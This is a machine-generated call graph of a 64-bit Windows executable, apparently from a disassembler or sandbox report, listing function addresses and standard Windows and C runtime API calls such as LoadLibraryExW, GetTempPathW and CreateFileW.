7ff6266438de __vcrt_freefls 15994->16004 15999 7ff626641950 115 API calls 15995->15999 15996->16004 15998 7ff626643a0b 16000 7ff626648b90 40 API calls 15998->16000 16001 7ff6266439ce 15999->16001 16002 7ff626643a17 16000->16002 16001->15982 16003 7ff6266439de 16001->16003 16005 7ff626648b90 40 API calls 16002->16005 16006 7ff626642710 54 API calls 16003->16006 16009 7ff62664390e __vcrt_freefls 16004->16009 16358 7ff626648b30 16004->16358 16007 7ff626643a23 16005->16007 16015 7ff626643808 __vcrt_freefls 16006->16015 16008 7ff626648b90 40 API calls 16007->16008 16008->16009 16010 7ff626648a20 14 API calls 16009->16010 16011 7ff626643a3b 16010->16011 16012 7ff626643b2f 16011->16012 16013 7ff626643a60 __vcrt_freefls 16011->16013 16014 7ff626642710 54 API calls 16012->16014 16016 7ff626648b30 40 API calls 16013->16016 16021 7ff626643aab 16013->16021 16014->16015 16365 7ff62664c5c0 16015->16365 16016->16021 16017 7ff626648a20 14 API calls 16018 7ff626643bf4 __vcrt_freefls 16017->16018 16019 7ff626643c46 16018->16019 16020 7ff626643d41 16018->16020 16022 7ff626643c50 16019->16022 16023 7ff626643cd4 16019->16023 16374 7ff6266444d0 16020->16374 16021->16017 16240 7ff6266490e0 16022->16240 16026 7ff626648a20 14 API calls 16023->16026 16029 7ff626643ce0 16026->16029 16027 7ff626643d4f 16030 7ff626643d71 16027->16030 16031 7ff626643d65 16027->16031 16033 7ff626643c61 16029->16033 16036 7ff626643ced 16029->16036 16032 7ff626641c80 49 API calls 16030->16032 16377 7ff626644620 16031->16377 16043 7ff626643cc8 __vcrt_freefls 16032->16043 16039 7ff626642710 54 API calls 16033->16039 16040 7ff626641c80 49 API calls 16036->16040 16037 7ff626643dc4 16290 7ff626649400 16037->16290 16039->16015 16041 7ff626643d0b 16040->16041 16041->16043 16044 7ff626643d12 16041->16044 16043->16037 16045 7ff626643da7 SetDllDirectoryW LoadLibraryExW 16043->16045 16047 7ff626642710 54 API calls 16044->16047 16045->16037 16046 7ff626643dd7 SetDllDirectoryW 16049 7ff626643e0a 16046->16049 16090 7ff626643e5a 16046->16090 16047->16015 16051 7ff626648a20 14 API calls 16049->16051 16050 7ff626643ffc 16053 7ff626644029 16050->16053 16054 7ff626644006 PostMessageW GetMessageW 16050->16054 16057 7ff626643e16 __vcrt_freefls 16051->16057 16052 7ff626643f1b 16295 7ff6266433c0 16052->16295 16454 7ff626643360 16053->16454 16054->16053 16059 7ff626643ef2 16057->16059 16063 7ff626643e4e 16057->16063 16062 7ff626648b30 40 API calls 16059->16062 16062->16090 16063->16090 16380 7ff626646db0 16063->16380 16090->16050 16090->16052 16102 7ff626659bb3 16101->16102 16103 7ff626659bd4 16101->16103 16102->15947 18692 7ff62665a448 16103->18692 16106 7ff62664d328 GetModuleHandleW 16107 7ff62664d339 16106->16107 16107->15956 16109 7ff62664d011 16108->16109 16110 7ff62664cdd0 16109->16110 16111 7ff62664d8f8 7 API calls 16109->16111 16110->15945 16111->16110 16113 7ff62664d1c2 _CreateFrameInfo memcpy_s 16112->16113 16114 7ff62664d1e1 RtlCaptureContext RtlLookupFunctionEntry 16113->16114 16115 7ff62664d20a RtlVirtualUnwind 16114->16115 16116 7ff62664d246 memcpy_s 16114->16116 16115->16116 16117 7ff62664d278 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16116->16117 16118 7ff62664d2c6 _CreateFrameInfo 16117->16118 16118->15943 16120 7ff62664d90a 16119->16120 16121 7ff62664d900 16119->16121 16120->15961 16125 7ff62664dc94 16121->16125 16126 7ff62664dca3 16125->16126 16127 7ff62664d905 16125->16127 16133 7ff62664ded0 16126->16133 16129 7ff62664dd00 16127->16129 16130 7ff62664dd2b 16129->16130 16131 7ff62664dd0e DeleteCriticalSection 16130->16131 16132 7ff62664dd2f 16130->16132 16131->16130 16132->16120 16137 7ff62664dd38 16133->16137 16138 7ff62664de22 TlsFree 16137->16138 16144 7ff62664dd7c __vcrt_FlsAlloc 16137->16144 16139 7ff62664ddaa LoadLibraryExW 16141 7ff62664ddcb GetLastError 16139->16141 16142 7ff62664de49 16139->16142 16140 7ff62664de69 GetProcAddress 16140->16138 16141->16144 16142->16140 16143 7ff62664de60 FreeLibrary 16142->16143 16143->16140 16144->16138 16144->16139 16144->16140 16145 7ff62664dded LoadLibraryExW 16144->16145 16145->16142 16145->16144 16147 7ff62666a530 16146->16147 16147->15966 16147->16147 16151 7ff62665f4f0 16148->16151 16149 7ff62665f543 16467 7ff62665a884 16149->16467 16151->16149 16152 7ff62665f596 16151->16152 16477 7ff62665f3c8 16152->16477 16154 7ff62665f56c 16154->15970 16584 7ff62664c8c0 16155->16584 16158 7ff6266436eb GetLastError 16591 7ff626642c50 16158->16591 16159 7ff626643710 16586 7ff6266492f0 FindFirstFileExW 16159->16586 16163 7ff62664377d 16617 7ff6266494b0 16163->16617 16164 7ff626643723 16606 7ff626649370 CreateFileW 16164->16606 16166 7ff62664c5c0 _log10_special 8 API calls 16169 7ff6266437b5 16166->16169 16168 7ff62664378b 16171 7ff626643706 16168->16171 16174 7ff626642810 49 API calls 16168->16174 16169->16015 16177 7ff626641950 16169->16177 16171->16166 16172 7ff62664374c __vcrt_FlsAlloc 16172->16163 16173 7ff626643734 16609 7ff626642810 16173->16609 16174->16171 16178 7ff6266445b0 108 API calls 16177->16178 16179 7ff626641985 16178->16179 16180 7ff626641c43 16179->16180 16182 7ff626647f80 83 API calls 16179->16182 16181 7ff62664c5c0 _log10_special 8 API calls 16180->16181 16184 7ff626641c5e 16181->16184 16183 7ff6266419cb 16182->16183 16226 7ff626641a03 16183->16226 17022 7ff626650744 16183->17022 16184->15977 16184->15978 16186 7ff6266500bc 74 API calls 16186->16180 16187 7ff6266419e5 16188 7ff6266419e9 16187->16188 16189 7ff626641a08 16187->16189 16190 7ff626654f78 _get_daylight 11 API calls 16188->16190 17026 7ff62665040c 16189->17026 16192 7ff6266419ee 16190->16192 17029 7ff626642910 16192->17029 16195 7ff626641a26 16197 7ff626654f78 _get_daylight 11 API calls 16195->16197 16196 7ff626641a45 16199 7ff626641a5c 16196->16199 16200 7ff626641a7b 16196->16200 16198 7ff626641a2b 16197->16198 16201 7ff626642910 54 API calls 16198->16201 16202 7ff626654f78 _get_daylight 11 API calls 16199->16202 16203 7ff626641c80 49 API calls 16200->16203 16201->16226 16204 7ff626641a61 16202->16204 16205 7ff626641a92 16203->16205 16206 7ff626642910 54 API calls 16204->16206 16207 7ff626641c80 49 API calls 16205->16207 16206->16226 16208 7ff626641add 16207->16208 16209 7ff626650744 73 API calls 16208->16209 16210 7ff626641b01 16209->16210 16211 7ff626641b16 16210->16211 16212 7ff626641b35 16210->16212 16213 7ff626654f78 _get_daylight 11 API calls 16211->16213 16214 7ff62665040c _fread_nolock 53 API calls 16212->16214 16215 7ff626641b1b 16213->16215 16216 7ff626641b4a 16214->16216 16217 7ff626642910 54 API calls 16215->16217 16218 7ff626641b50 16216->16218 16219 7ff626641b6f 16216->16219 16217->16226 16221 7ff626654f78 _get_daylight 11 API calls 16218->16221 17044 7ff626650180 16219->17044 16223 7ff626641b55 16221->16223 16224 7ff626642910 54 API calls 16223->16224 16224->16226 16225 7ff626642710 54 API calls 16225->16226 16226->16186 16228 7ff626648a2a 16227->16228 16229 7ff626649400 2 API calls 16228->16229 16230 7ff626648a49 GetEnvironmentVariableW 16229->16230 16231 7ff626648a66 ExpandEnvironmentStringsW 16230->16231 16232 7ff626648ab2 16230->16232 16231->16232 16234 7ff626648a88 16231->16234 16233 7ff62664c5c0 _log10_special 8 API calls 16232->16233 16235 7ff626648ac4 16233->16235 16236 7ff6266494b0 2 API calls 16234->16236 16235->15987 16237 7ff626648a9a 16236->16237 16238 7ff62664c5c0 _log10_special 8 API calls 16237->16238 16239 7ff626648aaa 16238->16239 16239->15987 16241 7ff6266490f5 16240->16241 17262 7ff626648760 GetCurrentProcess OpenProcessToken 16241->17262 16244 7ff626648760 7 API calls 16245 7ff626649121 16244->16245 16246 7ff62664913a 16245->16246 16247 7ff626649154 16245->16247 16248 7ff6266426b0 48 API calls 16246->16248 16249 7ff6266426b0 48 API calls 16247->16249 16250 7ff626649152 16248->16250 16251 7ff626649167 LocalFree LocalFree 16249->16251 16250->16251 16252 7ff626649183 16251->16252 16254 7ff62664918f 16251->16254 17272 7ff626642b50 16252->17272 16255 7ff62664c5c0 _log10_special 8 API calls 16254->16255 16256 7ff626643c55 16255->16256 16256->16033 16257 7ff626648850 16256->16257 16258 7ff626648868 16257->16258 16259 7ff6266488ea GetTempPathW GetCurrentProcessId 16258->16259 16260 7ff62664888c 16258->16260 17281 7ff6266425c0 16259->17281 16262 7ff626648a20 14 API calls 16260->16262 16264 7ff626648898 16262->16264 16263 7ff626648918 __vcrt_freefls 16276 7ff626648955 __vcrt_freefls 16263->16276 17285 7ff626658bd8 16263->17285 17288 7ff6266481c0 16264->17288 16275 7ff62664c5c0 _log10_special 8 API calls 16277 7ff626643cbb 16275->16277 16281 7ff626649400 2 API calls 16276->16281 16289 7ff6266489c4 __vcrt_freefls 16276->16289 16277->16033 16277->16043 16282 7ff6266489a1 16281->16282 16283 7ff6266489a6 16282->16283 16284 7ff6266489d9 16282->16284 16285 7ff626649400 2 API calls 16283->16285 16286 7ff6266582a8 38 API calls 16284->16286 16286->16289 16289->16275 16291 7ff626649422 MultiByteToWideChar 16290->16291 16292 7ff626649446 16290->16292 16291->16292 16294 7ff62664945c __vcrt_freefls 16291->16294 16293 7ff626649463 MultiByteToWideChar 16292->16293 16292->16294 16293->16294 16294->16046 16298 7ff6266433ce memcpy_s 16295->16298 16296 7ff6266435c7 16297 7ff62664c5c0 _log10_special 8 API calls 16296->16297 16299 7ff626643664 16297->16299 16298->16296 16301 7ff626641c80 49 API calls 16298->16301 16302 7ff6266435e2 16298->16302 16307 7ff6266435c9 16298->16307 16308 7ff626642a50 54 API calls 16298->16308 16312 7ff6266435d0 16298->16312 17577 7ff626644550 16298->17577 17583 7ff626647e10 16298->17583 17595 7ff626641600 16298->17595 17643 7ff626647110 16298->17643 17647 7ff626644180 16298->17647 17691 7ff626644440 16298->17691 16299->16015 16314 7ff6266490c0 LocalFree 16299->16314 16301->16298 16304 7ff626642710 54 API calls 16302->16304 16304->16296 16309 7ff626642710 54 API calls 16307->16309 16308->16298 16309->16296 16313 7ff626642710 54 API calls 16312->16313 16313->16296 16316 7ff626641ca5 16315->16316 16317 7ff6266549f4 49 API calls 16316->16317 16318 7ff626641cc8 16317->16318 16318->15982 16320 7ff626649400 2 API calls 16319->16320 16321 7ff626648ba4 16320->16321 16322 7ff6266582a8 38 API calls 16321->16322 16323 7ff626648bb6 __vcrt_freefls 16322->16323 16323->15994 16325 7ff6266445bc 16324->16325 16326 7ff626649400 2 API calls 16325->16326 16327 7ff6266445e4 16326->16327 16328 7ff626649400 2 API calls 16327->16328 16329 7ff6266445f7 16328->16329 17874 7ff626656004 16329->17874 16332 7ff62664c5c0 _log10_special 8 API calls 16333 7ff62664392b 16332->16333 16333->15983 16334 7ff626647f80 16333->16334 16335 7ff626647fa4 16334->16335 16336 7ff626650744 73 API calls 16335->16336 16341 7ff62664807b __vcrt_freefls 16335->16341 16337 7ff626647fc0 16336->16337 16337->16341 18266 7ff626657938 16337->18266 16339 7ff626650744 73 API calls 16342 7ff626647fd5 16339->16342 16340 7ff62665040c _fread_nolock 53 API calls 16340->16342 16341->15988 16342->16339 16342->16340 16342->16341 16344 7ff6266500ec 16343->16344 18281 7ff62664fe98 16344->18281 16346 7ff626650105 16346->15983 16348 7ff62664c8c0 16347->16348 16349 7ff626642734 GetCurrentProcessId 16348->16349 16350 7ff626641c80 49 API calls 16349->16350 16351 7ff626642787 16350->16351 16352 7ff6266549f4 49 API calls 16351->16352 16353 7ff6266427cf 16352->16353 16354 7ff626642620 12 API calls 16353->16354 16355 7ff6266427f1 16354->16355 16356 7ff62664c5c0 _log10_special 8 API calls 16355->16356 16357 7ff626642801 16356->16357 16357->16015 16359 7ff626649400 2 API calls 16358->16359 16360 7ff626648b4c 16359->16360 16361 7ff626649400 2 API calls 16360->16361 16362 7ff626648b5c 16361->16362 16363 7ff6266582a8 38 API calls 16362->16363 16364 7ff626648b6a __vcrt_freefls 16363->16364 16364->15998 16367 7ff62664c5c9 16365->16367 16366 7ff626643ca7 16366->16106 16367->16366 16368 7ff62664c950 IsProcessorFeaturePresent 16367->16368 16369 7ff62664c968 16368->16369 18292 7ff62664cb48 RtlCaptureContext 16369->18292 16375 7ff626641c80 49 API calls 16374->16375 16376 7ff6266444ed 16375->16376 16376->16027 16378 7ff626641c80 49 API calls 16377->16378 16379 7ff626644650 16378->16379 16379->16043 16381 7ff626646dc5 16380->16381 16382 7ff626643e6c 16381->16382 16383 7ff626654f78 _get_daylight 11 API calls 16381->16383 16386 7ff626647330 16382->16386 16384 7ff626646dd2 16383->16384 16385 7ff626642910 54 API calls 16384->16385 16385->16382 18297 7ff626641470 16386->18297 16388 7ff626647358 18403 7ff626646350 16454->18403 16456 7ff626643399 16463 7ff626643670 16456->16463 16484 7ff62665a5cc 16467->16484 16470 7ff62665a8bf 16470->16154 16583 7ff6266554dc EnterCriticalSection 16477->16583 16485 7ff62665a5e8 GetLastError 16484->16485 16486 7ff62665a623 16484->16486 16487 7ff62665a5f8 16485->16487 16486->16470 16490 7ff62665a638 16486->16490 16497 7ff62665b400 16487->16497 16491 7ff62665a66c 16490->16491 16492 7ff62665a654 GetLastError SetLastError 16490->16492 16491->16470 16493 7ff62665a970 IsProcessorFeaturePresent 16491->16493 16492->16491 16494 7ff62665a983 16493->16494 16575 7ff62665a684 16494->16575 16498 7ff62665b43a FlsSetValue 16497->16498 16499 7ff62665b41f FlsGetValue 16497->16499 16501 7ff62665b447 16498->16501 16502 7ff62665a613 SetLastError 16498->16502 16500 7ff62665b434 16499->16500 16499->16502 16500->16498 16514 7ff62665ec08 16501->16514 16502->16486 16505 7ff62665b474 FlsSetValue 16508 7ff62665b492 16505->16508 16509 7ff62665b480 FlsSetValue 16505->16509 16506 7ff62665b464 FlsSetValue 16507 7ff62665b46d 16506->16507 16521 7ff62665a9b8 16507->16521 16527 7ff62665af64 16508->16527 16509->16507 16519 7ff62665ec19 _get_daylight 16514->16519 16515 7ff62665ec6a 16535 7ff626654f78 16515->16535 16516 7ff62665ec4e HeapAlloc 16518 7ff62665b456 16516->16518 16516->16519 16518->16505 16518->16506 16519->16515 16519->16516 16532 7ff626663600 16519->16532 16522 7ff62665a9bd RtlFreeHeap 16521->16522 16526 7ff62665a9ec 16521->16526 16523 7ff62665a9d8 GetLastError 16522->16523 16522->16526 16524 7ff62665a9e5 __free_lconv_mon 16523->16524 16525 7ff626654f78 _get_daylight 9 API calls 16524->16525 16525->16526 16526->16502 16561 7ff62665ae3c 16527->16561 16538 7ff626663640 16532->16538 16544 7ff62665b338 GetLastError 16535->16544 16537 7ff626654f81 16537->16518 16543 7ff626660348 EnterCriticalSection 16538->16543 16545 7ff62665b35c 16544->16545 16546 7ff62665b379 FlsSetValue 16544->16546 16545->16546 16558 7ff62665b369 16545->16558 16547 7ff62665b38b 16546->16547 16546->16558 16549 7ff62665ec08 _get_daylight 5 API calls 16547->16549 16548 7ff62665b3e5 SetLastError 16548->16537 16550 7ff62665b39a 16549->16550 16551 7ff62665b3b8 FlsSetValue 16550->16551 16552 7ff62665b3a8 FlsSetValue 16550->16552 16554 7ff62665b3d6 16551->16554 16555 7ff62665b3c4 FlsSetValue 16551->16555 16553 7ff62665b3b1 16552->16553 16556 7ff62665a9b8 __free_lconv_mon 5 API calls 16553->16556 16557 7ff62665af64 _get_daylight 5 API calls 16554->16557 16555->16553 16556->16558 16559 7ff62665b3de 16557->16559 16558->16548 16560 7ff62665a9b8 __free_lconv_mon 5 API calls 16559->16560 16560->16548 16573 7ff626660348 EnterCriticalSection 16561->16573 16576 7ff62665a6be _CreateFrameInfo memcpy_s 16575->16576 16577 7ff62665a6e6 RtlCaptureContext RtlLookupFunctionEntry 16576->16577 16578 7ff62665a756 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16577->16578 16579 7ff62665a720 RtlVirtualUnwind 16577->16579 16580 7ff62665a7a8 _CreateFrameInfo 16578->16580 16579->16578 16581 7ff62664c5c0 _log10_special 8 API calls 16580->16581 16582 7ff62665a7c7 GetCurrentProcess TerminateProcess 16581->16582 16585 7ff6266436bc GetModuleFileNameW 16584->16585 16585->16158 16585->16159 16587 7ff62664932f FindClose 16586->16587 16588 7ff626649342 16586->16588 16587->16588 16589 7ff62664c5c0 _log10_special 8 API calls 16588->16589 16590 7ff62664371a 16589->16590 16590->16163 16590->16164 16592 7ff62664c8c0 16591->16592 16593 7ff626642c70 GetCurrentProcessId 16592->16593 16622 7ff6266426b0 16593->16622 16595 7ff626642cb9 16626 7ff626654c48 16595->16626 16598 7ff6266426b0 48 API calls 16599 7ff626642d34 FormatMessageW 16598->16599 16601 7ff626642d6d 16599->16601 16602 7ff626642d7f MessageBoxW 16599->16602 16603 7ff6266426b0 48 API calls 16601->16603 16604 7ff62664c5c0 _log10_special 8 API calls 16602->16604 16603->16602 16605 7ff626642daf 16604->16605 16605->16171 16607 7ff626643730 16606->16607 16608 7ff6266493b0 GetFinalPathNameByHandleW CloseHandle 16606->16608 16607->16172 16607->16173 16608->16607 16610 7ff626642834 16609->16610 16611 7ff6266426b0 48 API calls 16610->16611 16612 7ff626642887 16611->16612 16613 7ff626654c48 48 API calls 16612->16613 16614 7ff6266428d0 MessageBoxW 16613->16614 16615 7ff62664c5c0 _log10_special 8 API calls 16614->16615 16616 7ff626642900 16615->16616 16616->16171 16618 7ff6266494da WideCharToMultiByte 16617->16618 16619 7ff626649505 16617->16619 16618->16619 16621 7ff62664951b __vcrt_freefls 16618->16621 16620 7ff626649522 WideCharToMultiByte 16619->16620 16619->16621 16620->16621 16621->16168 16623 7ff6266426d5 16622->16623 16624 7ff626654c48 48 API calls 16623->16624 16625 7ff6266426f8 16624->16625 16625->16595 16630 7ff626654ca2 16626->16630 16627 7ff626654cc7 16628 7ff62665a884 _invalid_parameter_noinfo 37 API calls 16627->16628 16632 7ff626654cf1 16628->16632 16629 7ff626654d03 16644 7ff626653000 16629->16644 16630->16627 16630->16629 16634 7ff62664c5c0 _log10_special 8 API calls 16632->16634 16633 7ff626654de4 16635 7ff62665a9b8 __free_lconv_mon 11 API calls 16633->16635 16636 7ff626642d04 16634->16636 16635->16632 16636->16598 16638 7ff626654e0a 16638->16633 16640 7ff626654e14 16638->16640 16639 7ff626654db9 16641 7ff62665a9b8 __free_lconv_mon 11 API calls 16639->16641 16643 7ff62665a9b8 __free_lconv_mon 11 API calls 16640->16643 16641->16632 16642 7ff626654db0 16642->16633 16642->16639 16643->16632 16645 7ff62665303e 16644->16645 16646 7ff62665302e 16644->16646 16647 7ff626653047 16645->16647 16653 7ff626653075 16645->16653 16649 7ff62665a884 _invalid_parameter_noinfo 37 API calls 16646->16649 16650 7ff62665a884 _invalid_parameter_noinfo 37 API calls 16647->16650 16648 7ff62665306d 16648->16633 16648->16638 16648->16639 16648->16642 16649->16648 16650->16648 16653->16646 16653->16648 16655 7ff626653a14 16653->16655 16688 7ff626653460 16653->16688 16725 7ff626652bf0 16653->16725 16656 7ff626653a56 16655->16656 16657 7ff626653ac7 16655->16657 16660 7ff626653a5c 16656->16660 16661 7ff626653af1 16656->16661 16658 7ff626653acc 16657->16658 16659 7ff626653b20 16657->16659 16662 7ff626653ace 16658->16662 16663 7ff626653b01 16658->16663 16667 7ff626653b2a 16659->16667 16668 7ff626653b37 16659->16668 16673 7ff626653b2f 16659->16673 16664 7ff626653a90 16660->16664 16665 7ff626653a61 16660->16665 16748 7ff626651dc4 16661->16748 16666 7ff626653a70 16662->16666 16675 7ff626653add 16662->16675 16755 7ff6266519b4 16663->16755 16670 7ff626653a67 16664->16670 16664->16673 16665->16668 16665->16670 16686 7ff626653b60 16666->16686 16728 7ff6266541c8 16666->16728 16667->16661 16667->16673 16762 7ff62665471c 16668->16762 16670->16666 16676 7ff626653aa2 16670->16676 16683 7ff626653a8b 16670->16683 16673->16686 16766 7ff6266521d4 16673->16766 16675->16661 16678 7ff626653ae2 16675->16678 16676->16686 16738 7ff626654504 16676->16738 16678->16686 16744 7ff6266545c8 16678->16744 16680 7ff62664c5c0 _log10_special 8 API calls 16682 7ff626653e5a 16680->16682 16682->16653 16683->16686 16687 7ff626653d4c 16683->16687 16773 7ff626654830 16683->16773 16686->16680 16687->16686 16779 7ff62665ea78 16687->16779 16689 7ff626653484 16688->16689 16690 7ff62665346e 16688->16690 16693 7ff62665a884 _invalid_parameter_noinfo 37 API calls 16689->16693 16713 7ff6266534c4 16689->16713 16691 7ff626653a56 16690->16691 16692 7ff626653ac7 16690->16692 16690->16713 16696 7ff626653a5c 16691->16696 16697 7ff626653af1 16691->16697 16694 7ff626653acc 16692->16694 16695 7ff626653b20 16692->16695 16693->16713 16698 7ff626653ace 16694->16698 16699 7ff626653b01 16694->16699 16703 7ff626653b2a 16695->16703 16704 7ff626653b37 16695->16704 16709 7ff626653b2f 16695->16709 16700 7ff626653a90 16696->16700 16701 7ff626653a61 16696->16701 16705 7ff626651dc4 38 API calls 16697->16705 16702 7ff626653a70 16698->16702 16711 7ff626653add 16698->16711 16707 7ff6266519b4 38 API calls 16699->16707 16706 7ff626653a67 16700->16706 16700->16709 16701->16704 16701->16706 16708 7ff6266541c8 47 API calls 16702->16708 16723 7ff626653b60 16702->16723 16703->16697 16703->16709 16710 7ff62665471c 45 API calls 16704->16710 16720 7ff626653a8b 16705->16720 16706->16702 16712 7ff626653aa2 16706->16712 16706->16720 16707->16720 16708->16720 16714 7ff6266521d4 38 API calls 16709->16714 16709->16723 16710->16720 16711->16697 16715 7ff626653ae2 16711->16715 16716 7ff626654504 46 API calls 16712->16716 16712->16723 16713->16653 16714->16720 16718 7ff6266545c8 37 API calls 16715->16718 16715->16723 16716->16720 16717 7ff62664c5c0 _log10_special 8 API calls 16719 7ff626653e5a 16717->16719 16718->16720 16719->16653 16721 7ff626654830 45 API calls 16720->16721 16720->16723 16724 7ff626653d4c 16720->16724 16721->16724 16722 7ff62665ea78 46 API calls 16722->16724 16723->16717 16724->16722 16724->16723 17005 7ff626651038 16725->17005 16729 7ff6266541ee 16728->16729 16791 7ff626650bf0 16729->16791 16733 7ff626654333 16736 7ff626654830 45 API calls 16733->16736 16737 7ff6266543c1 16733->16737 16735 7ff626654830 45 API calls 16735->16733 16736->16737 16737->16683 16739 7ff626654539 16738->16739 16740 7ff626654557 16739->16740 16741 7ff62665457e 16739->16741 16742 7ff626654830 45 API calls 16739->16742 16743 7ff62665ea78 46 API calls 16740->16743 16741->16683 16742->16740 16743->16741 16745 7ff6266545e9 16744->16745 16746 7ff62665a884 _invalid_parameter_noinfo 37 API calls 16745->16746 16747 7ff62665461a 16745->16747 16746->16747 16747->16683 16749 7ff626651df7 16748->16749 16750 7ff626651e26 16749->16750 16752 7ff626651ee3 16749->16752 16754 7ff626651e63 16750->16754 16937 7ff626650c98 16750->16937 16753 7ff62665a884 _invalid_parameter_noinfo 37 API calls 16752->16753 16753->16754 16754->16683 16756 7ff6266519e7 16755->16756 16757 7ff626651a16 16756->16757 16759 7ff626651ad3 16756->16759 16758 7ff626650c98 12 API calls 16757->16758 16761 7ff626651a53 16757->16761 16758->16761 16760 7ff62665a884 _invalid_parameter_noinfo 37 API calls 16759->16760 16760->16761 16761->16683 16763 7ff62665475f 16762->16763 16765 7ff626654763 __crtLCMapStringW 16763->16765 16945 7ff6266547b8 16763->16945 16765->16683 16767 7ff626652207 16766->16767 16768 7ff626652236 16767->16768 16770 7ff6266522f3 16767->16770 16769 7ff626650c98 12 API calls 16768->16769 16772 7ff626652273 16768->16772 16769->16772 16771 7ff62665a884 _invalid_parameter_noinfo 37 API calls 16770->16771 16771->16772 16772->16683 16774 7ff626654847 16773->16774 16949 7ff62665da28 16774->16949 16781 7ff62665eaa9 16779->16781 16788 7ff62665eab7 16779->16788 16780 7ff62665ead7 16783 7ff62665eae8 16780->16783 16784 7ff62665eb0f 16780->16784 16781->16780 16782 7ff626654830 45 API calls 16781->16782 16781->16788 16782->16780 16995 7ff626660110 16783->16995 16786 7ff62665eb9a 16784->16786 16787 7ff62665eb39 16784->16787 16784->16788 16789 7ff62665f910 _fread_nolock MultiByteToWideChar 16786->16789 16787->16788 16998 7ff62665f910 16787->16998 16788->16687 16789->16788 16792 7ff626650c16 16791->16792 16793 7ff626650c27 16791->16793 16799 7ff62665e5e0 16792->16799 16793->16792 16821 7ff62665d66c 16793->16821 16796 7ff626650c68 16798 7ff62665a9b8 __free_lconv_mon 11 API calls 16796->16798 16797 7ff62665a9b8 __free_lconv_mon 11 API calls 16797->16796 16798->16792 16800 7ff62665e5fd 16799->16800 16801 7ff62665e630 16799->16801 16802 7ff62665a884 _invalid_parameter_noinfo 37 API calls 16800->16802 16801->16800 16803 7ff62665e662 16801->16803 16812 7ff626654311 16802->16812 16807 7ff62665e775 16803->16807 16816 7ff62665e6aa 16803->16816 16804 7ff62665e867 16861 7ff62665dacc 16804->16861 16806 7ff62665e82d 16854 7ff62665de64 16806->16854 16807->16804 16807->16806 16809 7ff62665e7fc 16807->16809 16811 7ff62665e7bf 16807->16811 16813 7ff62665e7b5 16807->16813 16847 7ff62665e144 16809->16847 16837 7ff62665e374 16811->16837 16812->16733 16812->16735 16813->16806 16815 7ff62665e7ba 16813->16815 16815->16809 16815->16811 16816->16812 16828 7ff62665a514 16816->16828 16819 7ff62665a970 _isindst 17 API calls 16820 7ff62665e8c4 16819->16820 16822 7ff62665d6b7 16821->16822 16827 7ff62665d67b _get_daylight 16821->16827 16824 7ff626654f78 _get_daylight 11 API calls 16822->16824 16823 7ff62665d69e HeapAlloc 16825 7ff626650c54 16823->16825 16823->16827 16824->16825 16825->16796 16825->16797 16826 7ff626663600 _get_daylight 2 API calls 16826->16827 16827->16822 16827->16823 16827->16826 16829 7ff62665a521 16828->16829 16831 7ff62665a52b 16828->16831 16829->16831 16835 7ff62665a546 16829->16835 16830 7ff626654f78 _get_daylight 11 API calls 16832 7ff62665a532 16830->16832 16831->16830 16870 7ff62665a950 16832->16870 16833 7ff62665a53e 16833->16812 16833->16819 16835->16833 16836 7ff626654f78 _get_daylight 11 API calls 16835->16836 16836->16832 16873 7ff62666411c 16837->16873 16841 7ff62665e41c 16842 7ff62665e471 16841->16842 16843 7ff62665e43c 16841->16843 16846 7ff62665e420 16841->16846 16926 7ff62665df60 16842->16926 16922 7ff62665e21c 16843->16922 16846->16812 16848 7ff62666411c 38 API calls 16847->16848 16849 7ff62665e18e 16848->16849 16850 7ff626663b64 37 API calls 16849->16850 16851 7ff62665e1de 16850->16851 16852 7ff62665e1e2 16851->16852 16853 7ff62665e21c 45 API calls 16851->16853 16852->16812 16853->16852 16855 7ff62666411c 38 API calls 16854->16855 16856 7ff62665deaf 16855->16856 16857 7ff626663b64 37 API calls 16856->16857 16858 7ff62665df07 16857->16858 16859 7ff62665df0b 16858->16859 16860 7ff62665df60 45 API calls 16858->16860 16859->16812 16860->16859 16862 7ff62665db44 16861->16862 16863 7ff62665db11 16861->16863 16865 7ff62665db5c 16862->16865 16868 7ff62665dbdd 16862->16868 16864 7ff62665a884 _invalid_parameter_noinfo 37 API calls 16863->16864 16867 7ff62665db3d memcpy_s 16864->16867 16866 7ff62665de64 46 API calls 16865->16866 16866->16867 16867->16812 16868->16867 16869 7ff626654830 45 API calls 16868->16869 16869->16867 16871 7ff62665a7e8 _invalid_parameter_noinfo 37 API calls 16870->16871 16872 7ff62665a969 16871->16872 16872->16833 16874 7ff62666416f fegetenv 16873->16874 16875 7ff626667e9c 37 API calls 16874->16875 16878 7ff6266641c2 16875->16878 16876 7ff6266642b2 16879 7ff626667e9c 37 API calls 16876->16879 16877 7ff6266641ef 16881 7ff62665a514 __std_exception_copy 37 API calls 16877->16881 16878->16876 16882 7ff62666428c 16878->16882 16883 7ff6266641dd 16878->16883 16880 7ff6266642dc 16879->16880 16884 7ff626667e9c 37 API calls 16880->16884 16885 7ff62666426d 16881->16885 16886 7ff62665a514 __std_exception_copy 37 API calls 16882->16886 16883->16876 16883->16877 16887 7ff6266642ed 16884->16887 16888 7ff626665394 16885->16888 16893 7ff626664275 16885->16893 16886->16885 16890 7ff626668090 20 API calls 16887->16890 16889 7ff62665a970 _isindst 17 API calls 16888->16889 16891 7ff6266653a9 16889->16891 16896 7ff626664356 memcpy_s 16890->16896 16892 7ff62664c5c0 _log10_special 8 API calls 16894 7ff62665e3c1 16892->16894 16893->16892 16918 7ff626663b64 16894->16918 16895 7ff6266646ff memcpy_s 16896->16895 16897 7ff626664397 memcpy_s 16896->16897 16902 7ff626654f78 _get_daylight 11 API calls 16896->16902 16897->16897 16912 7ff6266647f3 memcpy_s 16897->16912 16914 7ff626664cdb memcpy_s 16897->16914 16898 7ff626663c80 37 API calls 16904 7ff626665157 16898->16904 16899 7ff6266649eb 16899->16899 16900 7ff626664a3f 16899->16900 16901 7ff6266653ac memcpy_s 37 API calls 16899->16901 16900->16898 16901->16900 16903 7ff6266647d0 16902->16903 16905 7ff62665a950 _invalid_parameter_noinfo 37 API calls 16903->16905 16906 7ff6266653ac memcpy_s 37 API calls 16904->16906 16917 7ff6266651b2 16904->16917 16905->16897 16906->16917 16907 7ff626665338 16909 7ff626667e9c 37 API calls 16907->16909 16908 7ff626654f78 11 API calls _get_daylight 16908->16912 16909->16893 16910 7ff626654f78 11 API calls _get_daylight 16910->16914 16911 7ff62665a950 37 API calls _invalid_parameter_noinfo 16911->16914 16912->16899 16912->16908 16915 7ff62665a950 37 API calls 